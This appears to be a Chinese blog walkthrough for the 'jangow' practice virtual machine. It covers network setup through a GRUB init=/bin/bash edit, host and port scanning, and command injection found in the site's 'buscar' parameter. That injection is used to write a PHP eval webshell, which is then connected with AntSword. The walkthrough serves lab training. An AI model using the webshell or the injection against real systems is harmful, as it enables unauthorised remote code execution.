当前位置: 首页 > news >正文

jangow靶机攻略

配置网卡

VMware需要配置,不配置扫不到ip,VirtualBox正常打开ip会直接显示出来

网卡配置都改成NAT

打开虚拟机,第一个框选第二行,回车

选第二个,按e键 

进入下一个框后,将ro 后面的修改为= rw signin init=/bin/bash

按ctrl+x ,进入命令界面 

cd etc

cd network

ls

vim interfaces

 进入文件后,把网卡改成ens33

之后重启,打开后就不用管了

 开始攻略

扫描ip

arp-scan -l

 扫描端口

nmap -sV 

 访问80端口

点击site

各个功能点都试了之后,发现在右上角的buscar点击之后网页上会有参数

输入whoami,发现有回显,说明存在漏洞

输入一句话木马

echo '<?php eval($_POST["cmd"]);'  > 1.php

访问发现成功写入 

 尝试使用蚁剑连接

相关文章:

  • Vue.js 过滤器(Filters):简化文本格式化的利器
  • 第十四届蓝桥杯省赛电子类单片机学习记录(客观题)
  • 2025 JMeter平替的五款工具
  • 中间件框架漏洞攻略
  • 室分覆盖(室内分布系统)详解
  • 二叉搜索树的最近公共祖先 删除二叉搜索树中的节点 修剪二叉搜索树(Java)
  • ClickHouse怎么学习
  • 数据库—sql语法基础
  • 健身房管理系统(源码+数据库)
  • 《HarmonyOS Next自定义TabBar页签凸起和凹陷案例与代码》
  • chatshare.xyz和chatshare.biz的差别和渠道!
  • 【踩坑日记】IDEA的ctrl+r快捷键冲突无法使用
  • 前端如何用canvas来做电影院选票功能
  • K8S学习之基础四十七:k8s中部署fluentd
  • Java多线程与高并发专题——如何利用 CompletableFuture 解决“聚合打车服务平台”的问题?
  • 2.4 隐函数及由参数方程确定的函数求导
  • C#中值类型与引用类型是直观使用示例
  • __init__.py
  • openGauss关联列数据类型不一致引起谓词传递失败
  • fuse性能关键参数entry_timeout
  • 83岁连丽如每周登台说书,还上了15堂连派评书课
  • 王沪宁主持召开全国政协主席会议
  • 李在明涉嫌违反《公职选举法》案将于5月1日宣判
  • 纪念|海上金石学的兴盛与王昶《金石萃编》
  • 三位成功女性,如何应对失败
  • 大理杨徐邱再审上诉案宣判:驳回上诉,维持再审一审判决